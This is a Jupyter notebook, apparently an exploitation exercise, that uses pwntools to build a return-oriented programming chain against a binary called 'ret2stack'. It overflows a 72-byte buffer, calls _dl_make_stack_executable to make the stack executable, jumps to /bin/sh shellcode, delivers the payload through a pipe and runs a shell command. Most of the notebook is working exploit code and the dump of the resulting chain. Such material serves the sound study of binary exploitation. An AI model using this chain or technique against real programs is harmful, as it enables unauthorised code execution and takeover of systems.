In [36]:
%load_ext autoreload
%autoreload 2
formatter = get_ipython().display_formatter.formatters['text/plain']
formatter.for_type(int, lambda n, p, cycle: p.text("0x%X" % n))

import os
os.sys.path.append('../../')

from pwn import *
from util import *


The autoreload extension is already loaded. To reload it, use:
  %reload_ext autoreload


In [37]:
context.clear(arch='amd64')
ret2stack = elf.load('./ret2stack')

In [ ]:
os.read(w_pipe, 1)

In [57]:
ret2stack_rop = ROP('./ret2stack')

# 载荷的构成如下

In [58]:

paddings = ret2stack_rop.generatePadding(0, 72)
pop_rdi_ret = ret2stack_rop.setRegisters({'rdi': 0})[0][0]
__stack_prot = ret2stack_rop.resolve('__stack_prot')
pop_rsi_ret = ret2stack_rop.setRegisters({'rsi': 0})[0][0]
7
mov_ptr_rdi_rsi_ret = 0x446cab
pop_rdi_ret
__libc_stack_end = ret2stack_rop.resolve('__libc_stack_end')
_dl_make_stack_executable = ret2stack_rop.resolve('_dl_make_stack_executable')
push_rsp_ret = 0x450804
shellcode = asm(shellcraft.sh())


In [59]:
payload = [
    paddings,
    pop_rdi_ret,
    __stack_prot,
    pop_rsi_ret,
    7,
    mov_ptr_rdi_rsi_ret,
    pop_rdi_ret,
    __libc_stack_end,
    _dl_make_stack_executable,
    push_rsp_ret,
    shellcode,
]

# payload_bits = b''
for p in payload:
    ret2stack_rop.raw(p)

In [60]:
print(ret2stack_rop.dump())

0x0000:      b'aaaabaaa' b'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaa'
0x0008:      b'caaadaaa'
0x0010:      b'eaaafaaa'
0x0018:      b'gaaahaaa'
0x0020:      b'iaaajaaa'
0x0028:      b'kaaalaaa'
0x0030:      b'maaanaaa'
0x0038:      b'oaaapaaa'
0x0040:      b'qaaaraaa'
0x0048:         0x400696 pop rdi; ret
0x0050:         0x6b8e30 __stack_prot
0x0058:         0x410173 pop rsi; ret
0x0060:              0x7
0x0068:         0x446cab
0x0070:         0x400696 pop rdi; ret
0x0078:         0x6b89f0 __libc_stack_end
0x0080:         0x47f9e0 _dl_make_stack_executable
0x0088:         0x450804
0x0090:   b'jhH\xb8/bin' b'jhH\xb8/bin///sPH\x89\xe7hri\x01\x01\x814$\x01\x01\x01\x011\xf6Vj\x08^H\x01\xe6VH\x89\xe61\xd2j;X\x0f\x05'
0x0098: b'///sPH\x89\xe7'
0x00a0: b'hri\x01\x01\x814$'
0x00a8: b'\x01\x01\x01\x011\xf6Vj'
0x00b0: b'\x08^H\x01\xe6VH\x89'
0x00b8: b'\xe61\xd2j;X\x0f\x05'


In [62]:
payload = ret2stack_rop.chain()

In [44]:
ret2stack_rop.find_gadget(['push rsp'])
ret2stack_rop.search(1, ['rsp'])
# ret2stack_rop.setRegisters({'rsp': 0})

Gadget(0x401d23, ['pop rsp', 'ret'], ['rsp'], 0x10)

In [63]:
write_pipe(payload + b'\n')

In [64]:
send_line2('ls')